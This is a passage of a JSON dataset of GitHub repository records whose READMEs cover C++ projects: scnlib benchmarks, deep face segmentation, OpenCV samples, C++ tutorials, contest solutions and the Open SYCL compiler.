(v1.1).\n\n## Benchmarks\n\n### Run-time performance\n\n![Benchmark results](benchmark/runtime/results.png?raw=true \"Benchmark results\")\n\nThese benchmarks were run on a Ubuntu 21.10 machine running kernel version 5.13.0-30, with an Intel Core i7-8565U processor, and compiled with gcc version 11.2.0, with `-O3 -DNDEBUG -march=native`.\nThe source code for the benchmarks can be seen in the `benchmark` directory.\n\nYou can run the benchmarks yourself by enabling `SCN_BENCHMARKS`.\n`SCN_BENCHMARKS` is enabled by default if `scn` is the root CMake project, and disabled otherwise.\n\n```sh\n$ cd build\n$ cmake -DCMAKE_BUILD_TYPE=Release -DSCN_BENCHMARKS=ON -DSCN_USE_NATIVE_ARCH=ON -DCMAKE_INTERPROCEDURAL_OPTIMIZATION=ON ..\n$ make -j\n# choose benchmark to run in ./benchmark/runtime/*/bench-*\n$ ./benchmark/runtime/integer/bench-int\n```\n\nTimes are in nanoseconds of CPU time. Lower is better.\n\n#### Integer parsing (`int`)\n\n| Test | `std::stringstream` | `sscanf` | `scn::scan` | `scn::scan_default` |\n| :----- |--------------------:|---------:|------------:|--------------------:|\n| Test 1 | 344 | 127 | 65.1 | 55.3 |\n| Test 2 | 81.2 | 651 | 68.3 | 64.8 |\n\n#### Floating-point parsing (`double`)\n\n| Test | `std::stringstream` | `sscanf` | `scn::scan` | `scn::scan_default` |\n| :----- |--------------------:|---------:|------------:|--------------------:|\n| Test 1 | 612 | 211 | 69.5 | 69.1 |\n| Test 2 | 200 | 510 | 83.4 | 75.3 |\n\n#### Reading random whitespace-separated strings\n\n| Character type | `std::stringstream` | `scn::scan` | `scn::scan` and `string_view` |\n| :------------- |--------------------:|------------:|------------------------------:|\n| `char` | 63.3 | 56.9 | 51.0 |\n| `wchar_t` | 157 | 58.8 | 62.8 |\n\n#### Conclusions\n\n`scn::scan` is faster than the standard library offerings in all cases, sometimes over 8x faster.\n\nUsing `scn::scan_default` can sometimes have a slight performance benefit over `scn::scan`.\n\n#### Test 1 vs. Test 2\n\nIn the above comparisons:\n\n * \"Test 1\" refers to parsing a single value from a string which only contains the string representation for that value.\n The time used for constructing parser state is included.\n For example, the source string could be `\"123\"`.\n In this case, a parser is constructed, and a value (`123`) is parsed.\n This test is called \"single\" in the benchmark sources.\n * \"Test 2\" refers to the average time of parsing a value from a string containing multiple string representations separated by spaces.\n The time used for constructing parser state is not included.\n For example, the source string could be `\"123 456\"`.\n In this case, a parser is constructed before the timer is started.\n Then, a single value is read from the source, and the source is advanced to the start of the next value.\n The time it took to parse a single value is averaged out.\n This test is called \"repeated\" in the benchmark sources.\n\n### Executable size\n\nExecutable size benchmarks test generated code bloat for nontrivial projects.\nIt generates 25 translation units and reads values from stdin five times to simulate a medium sized project.\nThe resulting executable size is shown in the following tables and graphs.\nThe \"stripped size\" metric shows the size of the executable after running `strip`.\n\nThe code was compiled on Ubuntu 21.10 with g++ 11.2.0.\n`scnlib` is linked dynamically to level out the playing field compared to already dynamically linked `libc` and `libstdc++`.\nSee the directory `benchmark/bloat` for more information, e.g. templates for each TU.\n\nTo run these tests yourself:\n\n```sh\n$ cd build\n# For Debug\n$ cmake -DCMAKE_BUILD_TYPE=Debug -DSCN_BUILD_BLOAT=ON -DSCN_BUILD_BUILDTIME=OFF -DSCN_TESTS=OFF -DSCN_EXAMPLES=OFF -DBUILD_SHARED_LIBS=ON -DSCN_INSTALL=OFF ..\n# For Release\n$ cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INTERPROCEDURAL_OPTIMIZATION=ON -DSCN_BUILD_BLOAT=ON -DSCN_BUILD_BUILDTIME=OFF -DSCN_TESTS=OFF -DSCN_EXAMPLES=OFF -DBUILD_SHARED_LIBS=ON -DSCN_INSTALL=OFF ..\n# For Minimized Release\n$ cmake -DCMAKE_BUILD_TYPE=MinSizeRel -DCMAKE_INTERPROCEDURAL_OPTIMIZATION=ON -DSCN_BUILD_BLOAT=ON -DSCN_BUILD_BUILDTIME=OFF -DSCN_TESTS=OFF -DSCN_EXAMPLES=OFF -DBUILD_SHARED_LIBS=ON -DSCN_INSTALL=OFF ..\n\n$ make -j\n$ ./benchmark/bloat/run-bloat-tests.py ./benchmark/bloat\n```\n\nSizes are in kibibytes (KiB).\nLower is better.\n\n#### Minimized build (-Os -DNDEBUG)\n\n| Method | Executable size | Stripped size |\n| :------------------------------ | --------------: | ------------: |\n| empty | 15.4 | 14.0 |\n| `std::scanf` | 17.0 | 14.2 |\n| `std::istream` | 18.6 | 14.2 |\n| `scn::input` | 18.4 | 14.2 |\n| `scn::input` (header-only) | 120 | 94.3 |\n| `scn::scan_value` | 18.1 | 14.2 |\n| `scn::scan_value` (header-only) | 100 | 78.3 |\n\n![Benchmark results](benchmark/bloat/results_minsizerel.png?raw=true \"Benchmark results\")\n\n#### Release build (-O3 -DNDEBUG)\n\n| Method | Executable size | Stripped size |\n| :------------------------------ | --------------: | ------------: |\n| empty | 15.4 | 14.0 |\n| `std::scanf` | 17.0 | 14.2 |\n| `std::istream` | 18.6 | 14.2 |\n| `scn::input` | 18.2 | 14.2 |\n| `scn::input` (header-only) | 161 | 138 |\n| `scn::scan_value` | 18.6 | 14.2 |\n| `scn::scan_value` (header-only) | 124 | 106 |\n\n![Benchmark results](benchmark/bloat/results_release.png?raw=true \"Benchmark results\")\n\n#### Debug build (-g)\n\n| Method | Executable size | Stripped size |\n| :------------------------------ | --------------: | ------------: |\n| empty | 27.5 | 14.0 |\n| `std::scanf` | 605 | 22.2 |\n| `std::istream` | 651 | 26.2 |\n| `scn::input` | 1633 | 94.3 |\n| `scn::input` (header-only) | 10533 | 1010 |\n| `scn::scan_value` | 1765 | 90.3 |\n| `scn::scan_value` (header-only) | 9289 | 698 |\n\n![Benchmark results](benchmark/bloat/results_debug.png?raw=true \"Benchmark results\")\n\n#### Conclusions\n\nWhen using optimizing build options, scnlib provides equal binary size to ``, and a ~10% increase compared to `scanf`.\nIf using `strip`, these differences go away.\n\nOn Debug mode, scnlib is ~3x bigger compared to `` and `scanf`.\n\nHeader-only mode makes executable size ~6-7x bigger.\n\n### Build time\n\nThis test measures the time it takes to compile a binary when using different libraries.\nNote, that the time it takes to compile the library is not taken into account (unfair measurement against precompiled stdlibs).\n\nThese tests were run on an Ubuntu 21.10 machine with an i7-8565U and 40 GB of RAM, using GCC 11.2.0.\nThe compiler flags for a debug build were `-g`, and `-O3 -DNDEBUG` for a release build.\n\nTo run these tests yourself, enable CMake flag `SCN_BUILD_BUILDTIME`.\nIn order for these tests to work, `c++` must point to a gcc-compatible C++ compiler binary,\nand a POSIX-compatible `/usr/bin/time` must be present.\n\n```sh\n$ cd build\n$ cmake -DSCN_BUILD_BUILDTIME=ON ..\n$ make -j\n$ ./benchmark/buildtime/run-buildtime-tests.sh\n```\n\n#### Build time\n\nTime is in seconds of CPU time (user time + sys/kernel time).\nLower is better.\n\n| Method | Debug | Release |\n| :-------------------------- |------:|--------:|\n| empty | 0.07 | 0.03 |\n| `scanf` | 0.20 | 0.19 |\n| `std::istream` / `std::cin` | 0.26 | 0.24 |\n| `scn::input` | 0.55 | 0.54 |\n| `scn::input` (header only) | 1.88 | 3.69 |\n\n#### Memory consumption\n\nMemory is in mebibytes (MiB).\nLower is better.\n\n| Method | Debug | Release |\n| :-------------------------- |------:|--------:|\n| empty | 17.4 | 20.3 |\n| `scanf` | 49.1 | 49.7 |\n| `std::istream` / `std::cin` | 60.8 | 60.8 |\n| `scn::input` | 96.0 | 92.7 |\n| `scn::input` (header only) | 217 | 247 |\n\n#### Conclusions\n\nscnlib takes about 2x longer to compile compared to ``, and uses about 70% more memory.\n\nHeader-only mode can make compilation up to 7x slower, and use up to 3x as much memory.\n\n## Acknowledgements\n\nThe contents of this library are heavily influenced by {fmt} and its derivative works. \n \n\nThe bundled ranges implementation found from this library is based on NanoRange: \n\n\nThe default floating-point parsing algorithm used by this library is implemented by fast_float: \n\n\nThe Unicode-related parts of this library are based on utfcpp: \n\n\nThe design of this library is also inspired by the Python `parse` library: \n\n\n## License\n\nscnlib is licensed under the Apache License, version 2.0. \nCopyright (c) 2017 Elias Kosunen \nSee LICENSE for further details\n\nSee the directory `licenses/` for third-party licensing information.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "YuvalNirkin/face_segmentation", "link": "https://github.com/YuvalNirkin/face_segmentation", "tags": ["face", "segmentation"], "stars": 652, "description": "Deep face segmentation in extremely hard conditions", "lang": "C++", "repo_lang": "", "readme": "# Deep face segmentation in extremely hard conditions\n![alt text](https://yuvalnirkin.github.io/assets/img/projects/face_segmentation/face_segmentation_teaser.jpg \"Samples\") \nCOFW sample images segmented using our method.\n\n[Yuval Nirkin](http://www.nirkin.com/), [Iacopo Masi](http://www-bcf.usc.edu/~iacopoma/), [Anh Tuan Tran](https://sites.google.com/site/anhttranusc/), [Tal Hassner](http://www.openu.ac.il/home/hassner/), and [Gerard Medioni](http://iris.usc.edu/people/medioni/index.html).\n\n## News (10/07/18)\n- [New FCN model](https://github.com/YuvalNirkin/face_segmentation/releases/download/1.1/face_seg_fcn8s_300_no_aug.zip) released for lower resolution images (300X300), trained without augmentations. Useful if you have limited GPU memory.\n- A better performing and more efficient U-Net model will be released soon, including training and inference scripts using PyTorch. \n\n## Overview\nThis project provides an interface for face segmentation using Caffe with a fully convolutional neural network.\nThe network was trained on IARPA Janus CS2 dataset (excluding subjects that are also in [LFW](http://vis-www.cs.umass.edu/lfw/)) using a novel process for collecting ground truth face segmentations, involving our tool for [semi-supervised Face video segmentation](https://github.com/YuvalNirkin/face_video_segment). Additional synthetic images were generated by augmenting hands from the [EgoHands dataset](http://vision.soic.indiana.edu/projects/egohands/), and augmenting 3D models of glasses and microphones.\n\nIf you find this code useful, please make sure to cite our paper in your work:\n\nYuval Nirkin, Iacopo Masi, Anh Tuan Tran, Tal Hassner, Gerard Medioni, \"[On Face Segmentation, Face Swapping, and Face Perception](https://arxiv.org/abs/1704.06729)\", IEEE Conference on Automatic Face and Gesture Recognition (FG), Xi'an, China on May 2018\n\nPlease see [project page](http://www.openu.ac.il/home/hassner/projects/faceswap/) for more details, more resources and updates on this project.\n\n## Dependencies\n| Library | Minimum Version | Notes |\n|--------------------------------------------------------------------|-----------------|------------------------------------------|\n| [Boost](http://www.boost.org/) | 1.47 |Optional - For command line tools |\n| [OpenCV](http://opencv.org/) | 3.0 | |\n| [Caffe](https://github.com/BVLC/caffe) | 1.0 |\u2615\ufe0f |\n\n## Installation\n- Use CMake and your favorite compiler to build and install the library.\n- Download the [face_seg_fcn8s.zip](https://github.com/YuvalNirkin/face_segmentation/releases/download/1.0/face_seg_fcn8s.zip) or [face_seg_fcn8s_300_no_aug.zip](https://github.com/YuvalNirkin/face_segmentation/releases/download/1.1/face_seg_fcn8s_300_no_aug.zip) and extract to \"data\" in the installation directory.\n- Add \"bin\" in the installation directory to path.\n\n## Usage\n- For using the library's C++ interface, please take a look at the [Doxygen generated documentation](https://yuvalnirkin.github.io/docs/face_segmentation/).\n- For python go to \"interfaces/python\" in the installation directory and run:\n```BASH\npython face_seg.py\n```\n- For running the segmentation on a single image:\n```BASH\ncd path/to/face_segmentation/bin\nface_seg_image ../data/images/Alison_Lohman_0001.jpg -o . -m ../data/face_seg_fcn8s.caffemodel -d ../data/face_seg_fcn8s_deploy.prototxt\n```\n- For running the segmentation on all the images in a directory:\n```BASH\ncd path/to/face_segmentation/bin\nface_seg_batch ../data/images -o . -m ../data/face_seg_fcn8s.caffemodel -d ../data/face_seg_fcn8s_deploy.prototxt\n```\n- For running the segmentation on a list of images, first prepare a file \"img_list.txt\", in which each line is a path to an image and call the following command:\n```BASH\ncd path/to/face_segmentation/bin\nface_seg_batch img_list.txt -o . -m ../data/face_seg_fcn8s.caffemodel -d ../data/face_seg_fcn8s_deploy.prototxt\n```\n\nNote: The segmentation model was trained by cropping the training images using [find_face_landmarks](https://github.com/YuvalNirkin/find_face_landmarks). For best results crop the input images the same way, with crop resolution below 350 X 350. A Matlab function is available [here](https://github.com/YuvalNirkin/find_face_landmarks/blob/master/interfaces/matlab/bbox_from_landmarks.m).\n\n## Important note\nIn our paper we used a different network for our face segmentation. In the process of converting it to the Caffe model used in our [end-to-end face swap distribution](https://github.com/YuvalNirkin/face_swap) we notices some performance drop. We are working to fix this. We therefore ask that you please check here soon for updated on this Caffe model. \n\n## Citation\n\nPlease cite our paper with the following bibtex if you use our face segmentation network:\n\n``` latex\n@inproceedings{nirkin2018_faceswap,\n title={On Face Segmentation, Face Swapping, and Face Perception},\n booktitle = {IEEE Conference on Automatic Face and Gesture Recognition},\n author={Nirkin, Yuval and Masi, Iacopo and Tran, Anh Tuan and Hassner, Tal and Medioni, and G\\'{e}rard Medioni},\n year={2018},\n }\n```\n\n## Related projects\n- [End-to-end, automatic face swapping pipeline](https://github.com/YuvalNirkin/face_swap), example application using out face segmentation method.\n- [Interactive system for fast face segmentation ground truth labeling](https://github.com/YuvalNirkin/face_video_segment), used to produce the training set for our deep face segmentation.\n- [CNN3DMM](http://www.openu.ac.il/home/hassner/projects/CNN3DMM/), estimation of 3D face shapes from single images.\n- [ResFace101](http://www.openu.ac.il/home/hassner/projects/augmented_faces/), deep face recognition used in the paper to test face swapping capabilities. \n\n## Copyright\nCopyright 2017, Yuval Nirkin, Iacopo Masi, Anh Tuan Tran, Tal Hassner, and Gerard Medioni \n\nThe SOFTWARE provided in this page is provided \"as is\", without any guarantee made as to its suitability or fitness for any particular use. It may contain bugs, so use of this tool is at your own risk. We take no responsibility for any damage of any sort that may unintentionally be caused through its use.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Blitzer207/C-Resource", "link": "https://github.com/Blitzer207/C-Resource", "tags": [], "stars": 651, "description": "\u9ed1\u9a6c\u7a0b\u5e8f\u5458\u5320\u5fc3\u4e4b\u4f5c|C++\u6559\u7a0b\u4ece0\u52301\u5165\u95e8\u7f16\u7a0b", "lang": "C++", "repo_lang": "", "readme": "## C++ ingenuity from 0 to 1 entry information\n\n- [Phase 1 C++ Ingenuity from 0 to 1 Introduction] (Phase 1C%2B%2B%20 Ingenuity%20 From 0 to 1 Introduction/C%2B%2BBasic Introduction Handout/C%2B% 2B Basic Introduction.md)\n- [Phase 2 Actual Combat - Address Book Management](Phase 2 Actual Combat - Address Book Management/Address Book Management System Handout/Address Book Management System.md)\n- [Phase 3-C++ Core Programming](Phase 3-C%2B%2B Core Programming%20 Materials/Handouts/C%2B%2B Core Programming.md)\n- [Phase 4 Actual Combat-Enterprise Employee System Based on Polymorphism](Phase 4 Actual Combat-Enterprise Employee System Based on Polymorphism/Handouts/Employee Management System.md)\n- [Stage 5-C++ Improve Programming](Stage 5-C%2B%2B Improve Programming Materials/Enhance Programming Ability Materials/Lecture Notes/C%2B%2B Improve Programming.md)\n- [Phase 6 Actual Combat - Speech Contest Based on STL Generalized Programming] (Phase 6 Actual Combat - Speech Contest Based on STL Generalized Programming Materials/Data/Lectures/STL-Based Speech Contest Process Management System.md)\n- [Phase 7 - C++ practical project computer room reservation] (Phase 7 - C%2B%2B practical project computer room reservation information / computer room reservation system information / handouts / computer room reservation system.md)\n- [Attachment-C++ Programming Environment Construction Tutorial](Attachment-C%2B%2B Programming Environment Construction Tutorial/Tutorial File/C%2B%2B Development Environment Construction.md)\n\n## Video Tutorials\n\nhttps://www.bilibili.com/video/av41559729/\n\n## Communication group", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bytefish/opencv", "link": "https://github.com/bytefish/opencv", "tags": ["opencv", "face-recognition", "machine-learning"], "stars": 651, "description": "OpenCV projects: Face Recognition, Machine Learning, Colormaps, Local Binary Patterns, Examples...", "lang": "C++", "repo_lang": "", "readme": "# bytefish/opencv #\n\nThis repository contains OpenCV code and documents.\n\nMore (maybe) here: [https://www.bytefish.de](https://www.bytefish.de).\n\n## colormaps ##\n\nAn implementation of various colormaps for OpenCV2 C++ in order to enhance visualizations. Feel free to fork and add your own colormaps.\n\n### Related posts ###\n\n* https://bytefish.de/blog/colormaps_in_opencv\n \n## misc ##\n\nSample code that doesn't belong to a specific project. \n\n* Skin Color detection\n* PCA\n* TanTriggs Preprocessing\n\n## machinelearning ##\n\nDocument and sourcecode about OpenCV C++ machine learning API including:\n\n* Support Vector Machines\n* Multi Layer Perceptron\n* Normal Bayes\n* k-Nearest-Neighbor\n* Decision Tree\n\n### Related posts ###\n \n* https://www.bytefish.de/blog/machine_learning_opencv\n\n## eigenfaces ##\n\nEigenfaces implementation using the OpenCV2 C++ API. There's a very basic function for loading the dataset, you probably want to make this a bit more sophisticated. The dataset is available at [http://www.cl.cam.ac.uk/research/dtg/attarchive/facedatabase.html](http://www.cl.cam.ac.uk/research/dtg/attarchive/facedatabase.html).\n\n### Related posts ###\n\n* https://www.bytefish.de/blog/pca_in_opencv\n* https://www.bytefish.de/blog/eigenfaces\n* https://www.bytefish.de/blog/fisherfaces\n \n## lbp ##\n\nImplements various Local Binary Patterns with the OpenCV2 C++ API:\n \n* Original LBP\n* Circular LBP (also known as Extended LBP)\n* Variance-based LBP\n\nBasic code for spatial histograms and histogram matching with a chi-square distance is included, but it's not finished right now. There's a tiny demo application you can experiment with.\n\n### Related posts ###\n\n* https://www.bytefish.de/blog/local_binary_patterns\n* https://www.bytefish.de/blog/numpy_performance/\n \n## lda ##\n\nFisherfaces implementation with the OpenCV2 C++ API. \n\n### Related posts ###\n\n* https://www.bytefish.de/blog/fisherfaces\n* https://www.bytefish.de/blog/lda_in_opencv\n* https://www.bytefish.de/blog/fisherfaces_in_opencv\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "richenyunqi/CCF-CSP-and-PAT-solution", "link": "https://github.com/richenyunqi/CCF-CSP-and-PAT-solution", "tags": ["ccf-csp", "pat", "vscode", "cpp14"], "stars": 650, "description": "CCF CSP\u548cPAT\u8003\u8bd5\u9898\u89e3\uff08\u4f7f\u7528C++14\u8bed\u6cd5\uff09", "lang": "C++", "repo_lang": "", "readme": "[![996.icu](https://img.shields.io/badge/link-996.icu-red.svg)](https://996.icu) [![LICENSE](https:// img.shields.io/badge/license-Anti%20996-blue.svg)](https://github.com/996icu/996.ICU/blob/master/LICENSE)\n\n# CCF CSP exam and PAT class A and B exam questions\n\n\n\nThis warehouse is a supporting warehouse for the book \"Detailed Algorithm Explanation (C++11 Language Description)\", which is mainly responsible for updating the codes of CCF CSP and PAT Class A and Class B problems. The book \"Detailed Algorithm Explanation (C++11 Language Description)\" has been put on the shelves of major e-commerce platforms, and you can find the corresponding products by searching the title of the book. For information about book errata, please refer to [Book Errata](Book Errata.md).\n\nFor an introduction to the CCF CSP exam, please refer to [CCF CSP Certification Examination Online Evaluation System] (https://www.cnblogs.com/richenyunqi/p/14892974.html), for an introduction to the PAT exam, please refer to [Zhejiang University Computer Programming Introduction to Proficiency Test (PAT)](https://www.cnblogs.com/richenyunqi/p/14892982.html). The code in this warehouse will be maintained all the time, and new solutions will be updated as soon as possible after each exam. I hope this work can give some help to algorithm beginners. Since both the CCF CSP and PAT exams already support the C++14 standard, **all the solution codes in this warehouse will be written based on the C++14 grammar**. Before compiling the code in this repository, it is best to choose a compiling environment that supports C++14.\n\nIf you find any problems with the code in this warehouse, please provide an explanation by submitting an issue, preferably with wrong input data or correct solution code.\n\n## Solution directory\n\nFor the convenience of reference, a summary link of the problem solutions in this warehouse is attached under the [Problem Solution Catalogue] (Problem Solution Catalogue) folder:\n\n1. [CCF CSP Problem Solution Catalog](Problem Solution Catalog/CCF%20CSP Problem Solution Catalog.md)\n2. [PAT Class A Problem Solution Catalog](Problem Solution Catalog/PAT Class A Problem Solution Catalog.md)\n3. [PAT Level B Problem Solution Catalog](Problem Solution Catalog/PAT Level B Problem Solution Catalog.md)\n\n## related suggestion\n\n1. In order to better browse this repository, it is recommended to use `chrome` or the new version of `Edge` browser and install the following plug-ins (the plug-in links provided here need to be opened scientifically). There are many ways to surf the Internet scientifically. For example, by installing [Blue Lantern] (https://github.com/ainiyiwan/forum), you can normally access Google related websites.\n\n 1. [Gitako - GitHub file tree](https://chrome.google.com/webstore/detail/gitako-github-file-tree/giljefjcheohhamkjphiebfjnlphnokk): For the opened Github code repository, it can provide the project directory and Automatically generate a warehouse directory tree sidebar, through this plugin you can easily open any file in this warehouse.\n 2. [MathJax Plugin for Github](https://chrome.google.com/webstore/detail/mathjax-plugin-for-github/ioemnmodlmafdkllaclgeombjnmnbima): Render the `latex` syntax of `markdown` text on `github` .\n\n2. It is recommended to install VSCode and configure accordingly to write and run C++ code. VSCode is a modern editor. Compared with vc++, CodeBlocks, Dev c++ and other old IDEs, VSCode provides more powerful functions; compared with Visual Studio, VSCode is smaller. For the installation of VSCode and the configuration of the C/C++ environment, please refer to [Choose a handy weapon\u2014\u2014VSCode configures C/C++ learning environment (Xiao Baixiang)](https://zhuanlan.zhihu.com/p/147366852).\n3. You can use the windows batch file to compare program output and sample output or to perform program matching. You can refer to [Using VSCode Terminal to Redirect and Compare Program Output and Correct Output](https://www.cnblogs.com/richenyunqi/ p/14894172.html).\n4. For code templates of some common data structures and algorithms, please refer to [ACM, OI, OJ code templates](https://github.com/richenyunqi/code-templates).\n5. To facilitate communication, a QQ group has been established, the group number is [673612216](https://qm.qq.com/cgi-bin/qm/qr?k=7vZCZuLbDvjYI33zxScZMV0irFFaO-xH&jump_from=webapi), can be added as required.\n\n## Acknowledgments\n\n### Book Errata\n\nThanks to the sharp-eyed readers and friends who pointed out the errata of this book: Su Yixuan, Wang Zhaoxiang, [Frazier Lei](https://github.com/FrazierLei).\n\n### Code improvements\n\n- Thanks to [Night Walking Girl](https://me.csdn.net/qq_37967797) for improving the code of `CCF certification 201812-3CIDR merge`\n- Thanks to [Highlight_Jin](https://me.csdn.net/Highlight_Jin) for the improvement of `CCF certification 201512-4 delivery` code\n\n### Bug Tips\n\n- Thanks to **Zhang Jianxun** for pointing out the bugs in `CCF Certification 201612-1 Intermediate Number` and providing the corresponding error test data\n- Thanks to [Xingchen Haoyu](https://me.csdn.net/amf12345) for pointing out the bugs in `CCF Certification 201803-3URL Mapping` and providing the corresponding error test data\n- Thanks to [chocolate-emperor](https://github.com/chocolate-emperor) for the reminder of the code error of `CCF certification 201512-2 elimination game`\n- Thanks to [Tian Yixuan](https://me.csdn.net/qq_45057634) for the reminder of the code error of `CCF Certification 20161202-Salary Calculation`\n- Thanks to [Xu Jiacheng](https://github.com/xiaobanni) for pointing out the bugs in `CCF certification 201403-4 wireless network` and providing the corresponding error test data\n- Thanks to [promise6512](https://github.com/promise6512) for pointing out the bugs in `pat Class A 1104. Sum of Number Segments, Class B 1049. Fragments of Number Segments and`\n\n### Code Supplement\n\n- Thanks to [zhanyeye](https://github.com/zhanyeye) for supplementing the solution code of `CCF certification 201312-4 interesting number`\n\n## tip\n\nWarehouse maintenance is not easy, every tip and support from you is my motivation to keep updating and maintaining the warehouse. Thousands of rivers and mountains are always love, can I give a reward? \u053e \u053e\n\n
\n\n\n\n
\"alipay\"\"wechat\"
\n
", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "OpenSYCL/OpenSYCL", "link": "https://github.com/OpenSYCL/OpenSYCL", "tags": ["sycl", "opencl", "cuda", "hip", "gpgpu", "high-performance", "gpu", "gpu-computing", "high-performance-computing", "nvidia-cuda", "rocm", "clang", "hipsycl", "opensycl"], "stars": 650, "description": "Multi-backend implementation of SYCL for CPUs and GPUs", "lang": "C++", "repo_lang": "", "readme": "![Project logo](/doc/img/logo/logo-color.png)\n\n# Open SYCL (formerly known as hipSYCL)\n\n**(Note: This project is currently in progress of changing its name. Documentation and code may still use the older name hipSYCL)**\n\nOpen SYCL is a modern SYCL implementation targeting CPUs and GPUs from all major vendors that supports many use cases and approaches for implementing SYCL:\n\n1. **A generic, single-pass compiler infrastructure that compiles kernels to a unified code representation** that is then lowered at runtime to target devices, providing a high degree of portability, low compilation times, flexibility and extensibility. Support includes:\n 1. NVIDIA CUDA GPUs through PTX;\n 2. AMD ROCm GPUs through amdgcn code;\n 3. Intel GPUs through SPIR-V;\n2. Additionally, **Open SYCL can aggregate existing clang toolchains and augment them with support for SYCL constructs**. This allows for a high degree of interoperability between SYCL and other models such as CUDA or HIP. Support includes:\n 1. Any LLVM-supported CPU (including e.g. x86, arm, power etc) through the regular clang host toolchain with dedicated compiler transformation to accelerate SYCL constructs;\n 2. NVIDIA CUDA GPUs through the clang CUDA toolchain;\n 3. AMD ROCm GPUs through the clang HIP toolchain;\n 4. Intel GPUs through oneAPI Level Zero and the clang SYCL toolchain (*highly* experimental)\n3. Or **Open SYCL can be used in library-only compilation flows**. In these compilation flows, Open SYCL acts as a C++ library for third-party compilers. This can have portability advantages or simplify deployment. This includes support:\n 1. Any CPU supported by any OpenMP compilers;\n 2. NVIDIA GPUs through CUDA and the NVIDIA nvc++ compiler, bringing NVIDIA vendor support and day 1 hardware support to the SYCL ecosystem\n\n\nOpen SYCL supports compiling source files into a single binary that can run on all these backends when building against appropriate clang distributions. Additionally, **Open SYCL is the only major SYCL implementation that supports a single-pass compiler design, where the code is only parsed once for both host and target devices**. More information about the supported [compilation flows can be found here](doc/compilation.md).\n\nThe runtime architecture of Open SYCL consists of the main library `hipSYCL-rt`, as well as independent, modular plugin libraries for the individual backends:\n![Runtime architecture](/doc/img/runtime.png)\n\nOpen SYCL's compilation and runtime design allows Open SYCL to \n* Either provide a **single, unified compiler infrastructure with a single code representation across all targets**, or\n* to **effectively aggregate multiple toolchains that are otherwise incompatible, making them accessible with a single SYCL interface.**\n\nThe philosophy behind Open SYCL is to leverage such existing toolchains as much as possible. This brings not only maintenance and stability advantages, but enables performance on par with those established toolchains by design, and also allows for maximum interoperability with existing compute platforms.\nFor example, the Open SYCL CUDA and ROCm backends rely on the clang CUDA/HIP frontends that have been augmented by Open SYCL to *additionally* also understand SYCL code. This means that the Open SYCL compiler can not only compile SYCL code, but also CUDA/HIP code *even if they are mixed in the same source file*, making all CUDA/HIP features - such as the latest device intrinsics - also available from SYCL code ([details](doc/hip-source-interop.md)). Additionally, vendor-optimized template libraries such as rocPRIM or CUB can also be used with Open SYCL. Consequently, Open SYCL allows for **highly optimized code paths in SYCL code for specific devices**.\n\nBecause a SYCL program compiled with Open SYCL looks just like any other CUDA or HIP program to vendor-provided software, vendor tools such as profilers or debuggers also work well with Open SYCL.\n\nThe following image illustrates how Open SYCL fits into the wider SYCL implementation ecosystem:\n\n\n## About the project\n\nWhile Open SYCL started its life as a hobby project, development is now led and funded by Heidelberg University. Open SYCL not only serves as a research platform, but is also a solution used in production on machines of all scales, including some of the most powerful supercomputers.\n\n### Contributing to Open SYCL\n\nWe encourage contributions and are looking forward to your pull request! Please have a look at [CONTRIBUTING.md](CONTRIBUTING.md). If you need any guidance, please just open an issue and we will get back to you shortly.\n\nIf you are a student at Heidelberg University and wish to work on Open SYCL, please get in touch with us. There are various options possible and we are happy to include you in the project :-)\n\n### Citing Open SYCL\n\nOpen SYCL is a research project. As such, if you use Open SYCL in your research, we kindly request that you cite:\n\n*Aksel Alpay, B\u00e1lint Soproni, Holger W\u00fcnsche, and Vincent Heuveline. 2022. Exploring the possibility of a hipSYCL-based implementation of oneAPI. In International Workshop on OpenCL (IWOCL'22). Association for Computing Machinery, New York, NY, USA, Article 10, 1\u201312. https://doi.org/10.1145/3529538.3530005*\n\nor, depending on your focus,\n\n*Aksel Alpay and Vincent Heuveline. 2020. SYCL beyond OpenCL: The architecture, current state and future direction of hipSYCL. In Proceedings of the International Workshop on OpenCL (IWOCL \u201920). Association for Computing Machinery, New York, NY, USA, Article 8, 1. DOI:https://doi.org/10.1145/3388333.3388658*\n\n(The latter is a talk and available [online](https://www.youtube.com/watch?v=kYrY80J4ZAs). Note that some of the content in this talk is outdated by now)\n\n### Acknowledgements\n\nWe gratefully acknowledge [contributions](https://github.com/illuhad/hipSYCL/graphs/contributors) from the community.\n\n## Performance\n\nOpen SYCL has been repeatedly shown to deliver very competitive performance compared to other SYCL implementations or proprietary solutions like CUDA. See for example:\n\n* *Sohan Lal, Aksel Alpay, Philip Salzmann, Biagio Cosenza, Nicolai Stawinoga, Peter Thoman, Thomas Fahringer, and Vincent Heuveline. 2020. SYCL-Bench: A Versatile Single-Source Benchmark Suite for Heterogeneous Computing. In Proceedings of the International Workshop on OpenCL (IWOCL \u201920). Association for Computing Machinery, New York, NY, USA, Article 10, 1. DOI:https://doi.org/10.1145/3388333.3388669*\n* *Brian Homerding and John Tramm. 2020. Evaluating the Performance of the hipSYCL Toolchain for HPC Kernels on NVIDIA V100 GPUs. In Proceedings of the International Workshop on OpenCL (IWOCL \u201920). Association for Computing Machinery, New York, NY, USA, Article 16, 1\u20137. DOI:https://doi.org/10.1145/3388333.3388660*\n* *Tom Deakin and Simon McIntosh-Smith. 2020. Evaluating the performance of HPC-style SYCL applications. In Proceedings of the International Workshop on OpenCL (IWOCL \u201920). Association for Computing Machinery, New York, NY, USA, Article 12, 1\u201311. DOI:https://doi.org/10.1145/3388333.3388643*\n\n\n### Extracting performance & benchmarking Open SYCL\n\n#### General performance hints\n\n* Building Open SYCL against newer LLVM generally results in better performance for backends that are relying on LLVM.\n* Unlike other SYCL implementations that may rely on kernel compilation at runtime, Open SYCL relies heavily on ahead-of-time compilation. So make sure to use appropriate optimization flags when compiling.\n* For the CPU backend:\n * Don't forget that, due to Open SYCL's ahead-of-time compilation nature, you may also want to enable latest vectorization instruction sets when compiling, e.g. using `-march=native`.\n 